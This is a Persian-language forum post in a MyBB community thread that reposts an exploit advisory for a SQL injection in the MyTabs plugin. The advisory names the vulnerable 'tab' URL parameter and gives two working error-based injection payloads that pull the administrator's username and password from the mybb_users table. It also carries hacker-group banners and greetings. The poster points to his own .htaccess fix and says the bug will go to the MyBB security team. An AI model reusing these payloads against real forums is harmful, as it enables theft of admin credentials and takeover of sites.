• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت


امتیاز موضوع:
  • 0 رای - 0 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: پیدا شدن باگ sql injection در Mybb !
حالت خطی
#2
باگ بعدی 0day که یکی از معروف ترین پلاگین های mybb گرفته شده است.

نام پلاگین :

\ MyTabs

اسیب پذیری :

sql injection

کد پی‌اچ‌پی:
# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.




# Author: AutoRUN & dR.sqL




# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com




# Date : 01 \ 08 \ 2011




# Tested on : Windows XP , Linux




# Category : web apps




# Vulnerable Software Link : http://mods.mybb.com/view/mytabs




# Google dork : Use your mind kid ^_^ !









Vulnerability :









$~ 
http://localhost/mybbpath/index.php?tab=[SQLi]









---------------------------------------




# ~ Expl0itation ~ #




---------------------------------------









$~ 
Get the administrator's username (usually it has uid=1) ~









http://localhost/mybbpath/index.php?tab=1' 
and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -









$~ 
Get the administrator's password ~









http://localhost/mybbpath/index.php?tab=1' 
and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -














_ _ ____ _ _ _ _ _ _ ____ _ 




/ \ _ _| |_ ___ \| | | | \ | | __ _ _ __ __| | __| | ___ __ _| | 




\| | | | __\| |_) | | | | \| | / _` | '_ \ / _` | / _` | |_) | / __|/ _` | | 




___ \ |_| | |(_) | <| |_| | |\ | | (_| | | | | (_| | | (_| | _\__ \ (_| | |___ 




/_/ \_\__,_|\__\___/|_| \_\\___/|_| \_| \__,_|_| |_|\__,_| \__,_|_| \_(_)___/\__, |_____|




|
_



















# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.



















____ _ ____ ____ _ _ _ _ _ 




_ __ ___ _ _ __| | |___ \| __ ) / \ | | |__ __ _ _ __ (___ _ _ __ | |




| |
_) | '__/ _ \| | | |/ _` | __) | _ \ / _ \ | | '\ / _` | '_ \| |/ _` | '_ \ | |




| __/| | | (_) | |_| | (_| | / __/| |_) | / ___ \| | |_) | (_| | | | | | (_| | | | | |_|




|_| |_| \___/ \__,_|\__,_| |_____|____/ /_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_)














# 2011 



برای برطرف کردن این باگ هم باید از .htaccess که نوشتم استفاده کید.

باگ های دیگه هم هست

انشالا به زودی به تیم امنیتی mybb ارائه خواهد شد.
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
  


پیام‌های این موضوع
RE: پیدا شدن باگ sql injection در Mybb ! - توسط Amin_Mansouri - 06-06-2012، 03:55 PM

پرش به انجمن:


Browsing: 4 مهمان